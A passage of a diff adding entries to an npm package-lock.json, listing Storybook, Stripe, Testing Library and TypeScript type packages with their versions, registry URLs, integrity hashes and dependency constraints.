"optional": true + }, + "typescript": { + "optional": true + } + } + }, + "node_modules/@storybook/react-docgen-typescript-plugin": { + "version": "1.0.6--canary.9.0c3f3b7.0", + "resolved": "https://registry.npmjs.org/@storybook/react-docgen-typescript-plugin/-/react-docgen-typescript-plugin-1.0.6--canary.9.0c3f3b7.0.tgz", + "integrity": "sha512-KUqXC3oa9JuQ0kZJLBhVdS4lOneKTOopnNBK4tUAgoxWQ3u/IjzdueZjFr7gyBrXMoU6duutk3RQR9u8ZpYJ4Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^4.1.1", + "endent": "^2.0.1", + "find-cache-dir": "^3.3.1", + "flat-cache": "^3.0.4", + "micromatch": "^4.0.2", + "react-docgen-typescript": "^2.2.2", + "tslib": "^2.0.0" + }, + "peerDependencies": { + "typescript": ">= 4.x", + "webpack": ">= 4" + } + }, + "node_modules/@storybook/react-docgen-typescript-plugin/node_modules/find-cache-dir": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/find-cache-dir/-/find-cache-dir-3.3.2.tgz", + "integrity": "sha512-wXZV5emFEjrridIgED11OoUKLxiYjAcqot/NJdAkOhlJ+vGzwhOAfcG5OX1jP+S0PcjEn8bdMJv+g2jwQ3Onig==", + "dev": true, + "license": "MIT", + "dependencies": { + "commondir": "^1.0.1", + "make-dir": "^3.0.2", + "pkg-dir": "^4.1.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/avajs/find-cache-dir?sponsor=1" + } + }, + "node_modules/@storybook/react-docgen-typescript-plugin/node_modules/make-dir": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", + "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", + "dev": true, + "license": "MIT", + "dependencies": { + "semver": "^6.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/react-dom-shim": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/react-dom-shim/-/react-dom-shim-8.6.4.tgz", + "integrity": "sha512-kTGJ3aFdmfCFzYaDFGmZWfTXr9xhbUaf0tJ6+nEjc4tME6mFwMI+tTUT6U/J6mJhZuc2DjvIRA7bM0x77dIDqw==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/react-webpack5": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/react-webpack5/-/react-webpack5-8.6.4.tgz", + "integrity": "sha512-kH439Atpp94+hWF/xftOJ4ZCy7bnNWuLSni7sWvOGkYZpzzzkLXfACanvK6ZY9wUxAh0bbdGfbc3McMvIWfYlw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/builder-webpack5": "8.6.4", + "@storybook/preset-react-webpack": "8.6.4", + "@storybook/react": "8.6.4" + }, + "engines": { + "node": ">=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4", + "typescript": ">= 4.2.x" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@storybook/test": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/test/-/test-8.6.4.tgz", + "integrity": "sha512-JPjfbaMMuCBT47pg3/MDD9vYFF5OGPAOWEB9nJWJ9IjYAb2Nd8OYJQIDoYJQNT+aLkTVLtvzGnVNwdxpouAJcQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "@storybook/instrumenter": "8.6.4", + "@testing-library/dom": "10.4.0", + "@testing-library/jest-dom": "6.5.0", + "@testing-library/user-event": "14.5.2", + "@vitest/expect": "2.0.5", + "@vitest/spy": "2.0.5" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/test/node_modules/@testing-library/dom": { + "version": "10.4.0", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-10.4.0.tgz", + "integrity": "sha512-pemlzrSESWbdAloYml3bAJMEfNh1Z7EduzqPKprCH5S341frlpYnUEW0H72dLxa6IsYr+mPno20GiSm+h9dEdQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^5.0.1", + "aria-query": "5.3.0", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.5.0", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/@storybook/test/node_modules/@types/aria-query": { + "version": "5.0.4", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-5.0.4.tgz", + "integrity": "sha512-rfT93uj5s0PRL7EzccGMs3brplhcrghnDoV26NqKhCAS1hVo+WdNsPvE/yb6ilfr5hi2MEk6d5EWJTKdxg8jVw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@storybook/test/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@storybook/test/node_modules/aria-query": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.3.0.tgz", + "integrity": "sha512-b0P0sZPKtyu8HkeRAfCq0IfURZK+SuwMjY1UXGBU27wpAiTwQAIlq56IbIO+ytk/JjS1fMR14ee5WBBfKi5J6A==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "dequal": "^2.0.3" + } + }, + "node_modules/@storybook/test/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@storybook/test/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@storybook/theming": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/theming/-/theming-8.6.4.tgz", + "integrity": "sha512-g9Ns4uenC9oAWETaJ/tEKEIPMdS+CqjNWZz5Wbw1bLNhXwADZgKrVqawzZi64+bYYtQ+i8VCTjPoFa6s2eHiDQ==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.2.0 || ^8.3.0-0 || ^8.4.0-0 || ^8.5.0-0 || ^8.6.0-0" + } + }, + "node_modules/@stripe/react-stripe-js": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/@stripe/react-stripe-js/-/react-stripe-js-3.5.0.tgz", + "integrity": "sha512-oo5J2SNbuAUjE9XmQv/SOD7vgZCa1Y9OcZyRAfvQPkyrDrru35sg5c64ANdHEmOWUibism3+25rKdARSw3HOfA==", + "license": "MIT", + "dependencies": { + "prop-types": "^15.7.2" + }, + "peerDependencies": { + "@stripe/stripe-js": ">=1.44.1 <7.0.0", + "react": ">=16.8.0 <20.0.0", + "react-dom": ">=16.8.0 <20.0.0" + } + }, + "node_modules/@stripe/stripe-js": { + "version": "5.10.0", + "resolved": "https://registry.npmjs.org/@stripe/stripe-js/-/stripe-js-5.10.0.tgz", + "integrity": "sha512-PTigkxMdMUP6B5ISS7jMqJAKhgrhZwjprDqR1eATtFfh0OpKVNp110xiH+goeVdrJ29/4LeZJR4FaHHWstsu0A==", + "license": "MIT", + "engines": { + "node": ">=12.16" + } + }, + "node_modules/@swc/helpers": { + "version": "0.5.11", + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.11.tgz", + "integrity": "sha512-YNlnKRWF2sVojTpIyzwou9XoTNbzbzONwRhOoniEioF1AtaitTvVZblaQRrAzChWQ1bLYyYSWzM18y4WwgzJ+A==", + "dev": true, + "dependencies": { + "tslib": "^2.4.0" + } + }, + "node_modules/@testing-library/cypress": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/@testing-library/cypress/-/cypress-10.0.1.tgz", + "integrity": "sha512-e8uswjTZIBhaIXjzEcrQQ8nHRWHgZH7XBxKuIWxZ/T7FxfWhCR48nFhUX5nfPizjVOKSThEfOSv67jquc1ASkw==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.14.6", + "@testing-library/dom": "^9.0.0" + }, + "engines": { + "node": ">=12", + "npm": ">=6" + }, + "peerDependencies": { + "cypress": "^12.0.0 || ^13.0.0" + } + }, + "node_modules/@testing-library/cypress/node_modules/@testing-library/dom": { + "version": "9.3.3", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-9.3.3.tgz", + "integrity": "sha512-fB0R+fa3AUqbLHWyxXa2kGVtf1Fe1ZZFr0Zp6AIbIAzXb2mKbEXl+PCQNUOaq5lbTab5tfctfXRNsWXxa2f7Aw==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^5.0.1", + "aria-query": "5.1.3", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.5.0", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@testing-library/cypress/node_modules/@types/aria-query": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-5.0.2.tgz", + "integrity": "sha512-PHKZuMN+K5qgKIWhBodXzQslTo5P+K/6LqeKXS6O/4liIDdZqaX5RXrCK++LAw+y/nptN48YmUMFiQHRSWYwtQ==", + "dev": true + }, + "node_modules/@testing-library/cypress/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@testing-library/cypress/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@testing-library/cypress/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@testing-library/dom": { + "version": "8.13.0", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-8.13.0.tgz", + "integrity": "sha512-9VHgfIatKNXQNaZTtLnalIy0jNZzY35a4S3oi08YAt9Hv1VsfZ/DfA45lM8D/UhtHBGJ4/lGwp0PZkVndRkoOQ==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^4.2.0", + "aria-query": "^5.0.0", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.4.4", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@testing-library/dom/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@testing-library/dom/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@testing-library/dom/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@testing-library/jest-dom": { + "version": "6.5.0", + "resolved": "https://registry.npmjs.org/@testing-library/jest-dom/-/jest-dom-6.5.0.tgz", + "integrity": "sha512-xGGHpBXYSHUUr6XsKBfs85TWlYKpTc37cSBBVrXcib2MkHLboWlkClhWF37JKlDb9KEq3dHs+f2xR7XJEWGBxA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@adobe/css-tools": "^4.4.0", + "aria-query": "^5.0.0", + "chalk": "^3.0.0", + "css.escape": "^1.5.1", + "dom-accessibility-api": "^0.6.3", + "lodash": "^4.17.21", + "redent": "^3.0.0" + }, + "engines": { + "node": ">=14", + "npm": ">=6", + "yarn": ">=1" + } + }, + "node_modules/@testing-library/jest-dom/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@testing-library/jest-dom/node_modules/chalk": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-3.0.0.tgz", + "integrity": "sha512-4D3B6Wf41KOYRFdszmDqMCGq5VV/uMAB273JILmO+3jAlh8X4qDtdtgCR3fxtbLEMzSx22QdhnDcJvu2u1fVwg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@testing-library/jest-dom/node_modules/dom-accessibility-api": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/dom-accessibility-api/-/dom-accessibility-api-0.6.3.tgz", + "integrity": "sha512-7ZgogeTnjuHbo+ct10G9Ffp0mif17idi0IyWNVA/wcwcm7NPOD/WEHVP3n7n3MhXqxoIYm8d6MuZohYWIZ4T3w==", + "dev": true, + "license": "MIT" + }, + "node_modules/@testing-library/jest-dom/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@testing-library/react": { + "version": "12.1.5", + "resolved": "https://registry.npmjs.org/@testing-library/react/-/react-12.1.5.tgz", + "integrity": "sha512-OfTXCJUFgjd/digLUuPxa0+/3ZxsQmE7ub9kcbW/wi96Bh3o/p5vrETcBGfP17NWPGqeYYl5LTRpwyGoMC4ysg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5", + "@testing-library/dom": "^8.0.0", + "@types/react-dom": "<18.0.0" + }, + "engines": { + "node": ">=12" + }, + "peerDependencies": { + "react": "<18.0.0", + "react-dom": "<18.0.0" + } + }, + "node_modules/@testing-library/react-hooks": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@testing-library/react-hooks/-/react-hooks-8.0.1.tgz", + "integrity": "sha512-Aqhl2IVmLt8IovEVarNDFuJDVWVvhnr9/GCU6UUnrYXwgDFF9h2L2o2P9KBni1AST5sT6riAyoukFLyjQUgD/g==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5", + "react-error-boundary": "^3.1.0" + }, + "engines": { + "node": ">=12" + }, + "peerDependencies": { + "@types/react": "^16.9.0 || ^17.0.0", + "react": "^16.9.0 || ^17.0.0", + "react-dom": "^16.9.0 || ^17.0.0", + "react-test-renderer": "^16.9.0 || ^17.0.0" + }, + "peerDependenciesMeta": { + "@types/react": { + "optional": true + }, + "react-dom": { + "optional": true + }, + "react-test-renderer": { + "optional": true + } + } + }, + "node_modules/@testing-library/react-hooks/node_modules/react-error-boundary": { + "version": "3.1.4", + "resolved": "https://registry.npmjs.org/react-error-boundary/-/react-error-boundary-3.1.4.tgz", + "integrity": "sha512-uM9uPzZJTF6wRQORmSrvOIgt4lJ9MC1sNgEOj2XGsDTRE4kmpWxg7ENK9EWNKJRMAOY9z0MuF4yIfl6gp4sotA==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5" + }, + "engines": { + "node": ">=10", + "npm": ">=6" + }, + "peerDependencies": { + "react": ">=16.13.1" + } + }, + "node_modules/@testing-library/user-event": { + "version": "14.5.2", + "resolved": "https://registry.npmjs.org/@testing-library/user-event/-/user-event-14.5.2.tgz", + "integrity": "sha512-YAh82Wh4TIrxYLmfGcixwD18oIjyC1pFQC2Y01F2lzV2HTMiYrI0nze0FD0ocB//CKS/7jIUgae+adPqxK5yCQ==", + "dev": true, + "engines": { + "node": ">=12", + "npm": ">=6" + }, + "peerDependencies": { + "@testing-library/dom": ">=7.21.4" + } + }, + "node_modules/@tootallnate/once": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz", + "integrity": "sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==", + "engines": { + "node": ">= 10" + } + }, + "node_modules/@transloadit/prettier-bytes": { + "version": "0.0.7", + "resolved": "https://registry.npmjs.org/@transloadit/prettier-bytes/-/prettier-bytes-0.0.7.tgz", + "integrity": "sha512-VeJbUb0wEKbcwaSlj5n+LscBl9IPgLPkHVGBkh00cztv6X4L/TJXK58LzFuBKX7/GAfiGhIwH67YTLTlzvIzBA==", + "dev": true + }, + "node_modules/@trysound/sax": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/@trysound/sax/-/sax-0.2.0.tgz", + "integrity": "sha512-L7z9BgrNEcYyUYtF+HaEfiS5ebkh9jXqbszz7pC0hRBPaatV0XjSD3+eHrpqFemQfgwiFF0QPIarnIihIDn7OA==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/@types/accepts": { + "version": "1.3.5", + "resolved": "https://registry.npmjs.org/@types/accepts/-/accepts-1.3.5.tgz", + "integrity": "sha512-jOdnI/3qTpHABjM5cx1Hc0sKsPoYCp+DP/GJRGtDlPd7fiV9oXGGIcjW/ZOxLIvjGz8MA+uMZI9metHlgqbgwQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/adm-zip": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/@types/adm-zip/-/adm-zip-0.5.7.tgz", + "integrity": "sha512-DNEs/QvmyRLurdQPChqq0Md4zGvPwHerAJYWk9l2jCbD1VPpnzRJorOdiq4zsw09NFbYnhfsoEhWtxIzXpn2yw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/aria-query": { + "version": "4.2.2", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-4.2.2.tgz", + "integrity": "sha512-HnYpAE1Y6kRyKM/XkEuiRQhTHvkzMBurTHnpFLYLBGPIylZNPs9jJcuOOYWxPLJCSEtmZT0Y8rHDokKN7rRTig==", + "dev": true + }, + "node_modules/@types/aws-lambda": { + "version": "8.10.119", + "resolved": "https://registry.npmjs.org/@types/aws-lambda/-/aws-lambda-8.10.119.tgz", + "integrity": "sha512-Vqm22aZrCvCd6I5g1SvpW151jfqwTzEZ7XJ3yZ6xaZG31nUEOEyzzVImjRcsN8Wi/QyPxId/x8GTtgIbsy8kEw==" + }, + "node_modules/@types/babel__core": { + "version": "7.20.5", + "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", + "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.20.7", + "@babel/types": "^7.20.7", + "@types/babel__generator": "*", + "@types/babel__template": "*", + "@types/babel__traverse": "*" + } + }, + "node_modules/@types/babel__generator": { + "version": "7.6.8", + "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", + "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/types": "^7.0.0" + } + }, + "node_modules/@types/babel__template": { + "version": "7.4.4", + "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", + "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.1.0", + "@babel/types": "^7.0.0" + } + }, + "node_modules/@types/babel__traverse": { + "version": "7.20.6", + "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", + "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/types": "^7.20.7" + } + }, + "node_modules/@types/body-parser": { + "version": "1.19.2", + "resolved": "https://registry.npmjs.org/@types/body-parser/-/body-parser-1.19.2.tgz", + "integrity": "sha512-ALYone6pm6QmwZoAgeyNksccT9Q4AWZQ6PvfwR37GT6r6FWUPguq6sUmNGSMV2Wr761oQoBxwGGa6DR5o1DC9g==", + "dependencies": { + "@types/connect": "*", + "@types/node": "*" + } + }, + "node_modules/@types/bonjour": { + "version": "3.5.13", + "resolved": "https://registry.npmjs.org/@types/bonjour/-/bonjour-3.5.13.tgz", + "integrity": "sha512-z9fJ5Im06zvUL548KvYNecEVlA7cVDkGUi6kZusb04mpyEFKCIZJvloCcmpmLaIahDpOQGHaHmG6imtPMmPXGQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/bootstrap": { + "version": "5.2.10", + "resolved": "https://registry.npmjs.org/@types/bootstrap/-/bootstrap-5.2.10.tgz", + "integrity": "sha512-F2X+cd6551tep0MvVZ6nM8v7XgGN/twpdNDjqS1TUM7YFNEtQYWk+dKAnH+T1gr6QgCoGMPl487xw/9hXooa2g==", + "dev": true, + "dependencies": { + "@popperjs/core": "^2.9.2" + } + }, + "node_modules/@types/bootstrap-5": { + "name": "@types/bootstrap", + "version": "5.2.10", + "resolved": "https://registry.npmjs.org/@types/bootstrap/-/bootstrap-5.2.10.tgz", + "integrity": "sha512-F2X+cd6551tep0MvVZ6nM8v7XgGN/twpdNDjqS1TUM7YFNEtQYWk+dKAnH+T1gr6QgCoGMPl487xw/9hXooa2g==", + "dev": true, + "dependencies": { + "@popperjs/core": "^2.9.2" + } + }, + "node_modules/@types/bunyan": { + "version": "1.8.8", + "resolved": "https://registry.npmjs.org/@types/bunyan/-/bunyan-1.8.8.tgz", + "integrity": "sha512-Cblq+Yydg3u+sGiz2mjHjC5MPmdjY+No4qvHrF+BUhblsmSfMvsHLbOG62tPbonsqBj6sbWv1LHcsoe5Jw+/Ow==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/caseless": { + "version": "0.12.5", + "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz", + "integrity": "sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==" + }, + "node_modules/@types/chai": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/@types/chai/-/chai-4.3.0.tgz", + "integrity": "sha512-/ceqdqeRraGolFTcfoXNiqjyQhZzbINDngeoAq9GoHa8PPK1yNzTaxWjA6BFWp5Ua9JpXEMSS4s5i9tS0hOJtw==" + }, + "node_modules/@types/chai-as-promised": { + "version": "7.1.8", + "resolved": "https://registry.npmjs.org/@types/chai-as-promised/-/chai-as-promised-7.1.8.tgz", + "integrity": "sha512-ThlRVIJhr69FLlh6IctTXFkmhtP3NpMZ2QGq69StYLyKZFp/HOp1VdKZj7RvfNWYYcJ1xlbLGLLWj1UvP5u/Gw==", + "dependencies": { + "@types/chai": "*" + } + }, + "node_modules/@types/check-types": { + "version": "7.3.7", + "resolved": "https://registry.npmjs.org/@types/check-types/-/check-types-7.3.7.tgz", + "integrity": "sha512-ZNAGaVc/joAV3lAuRwPdsQY/caU1RvKoa+U7i/TkYIlOStdYq4vyArFnA1zItfEDkHpXNWApWIqqbp5fsHAiRg==", + "dev": true + }, + "node_modules/@types/connect": { + "version": "3.4.35", + "resolved": "https://registry.npmjs.org/@types/connect/-/connect-3.4.35.tgz", + "integrity": "sha512-cdeYyv4KWoEgpBISTxWvqYsVy444DOqehiF3fM3ne10AmJ62RSyNkUnxMJXHQWRQQX2eR94m5y1IZyDwBjV9FQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/connect-history-api-fallback": { + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/@types/connect-history-api-fallback/-/connect-history-api-fallback-1.5.4.tgz", + "integrity": "sha512-n6Cr2xS1h4uAulPRdlw6Jl6s1oG8KrVilPN2yUITEs+K48EzMJJ3W1xy8K5eWuFvjp3R74AOIGSmp2UfBJ8HFw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/express-serve-static-core": "*", + "@types/node": "*" + } + }, + "node_modules/@types/console-log-level": { + "version": "1.4.3", + "resolved": "https://registry.npmjs.org/@types/console-log-level/-/console-log-level-1.4.3.tgz", + "integrity": "sha512-B6Mzad6H4RugduMX84ehFVvGM/JRAd9lZQk4a6dztB4+zcIUehIjKrbWH/nHO2+0wwx05rgyqjXBvOjAv0uL6A==" + }, + "node_modules/@types/content-disposition": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/@types/content-disposition/-/content-disposition-0.5.5.tgz", + "integrity": "sha512-v6LCdKfK6BwcqMo+wYW05rLS12S0ZO0Fl4w1h4aaZMD7bqT3gVUns6FvLJKGZHQmYn3SX55JWGpziwJRwVgutA==" + }, + "node_modules/@types/cookie": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.6.0.tgz", + "integrity": 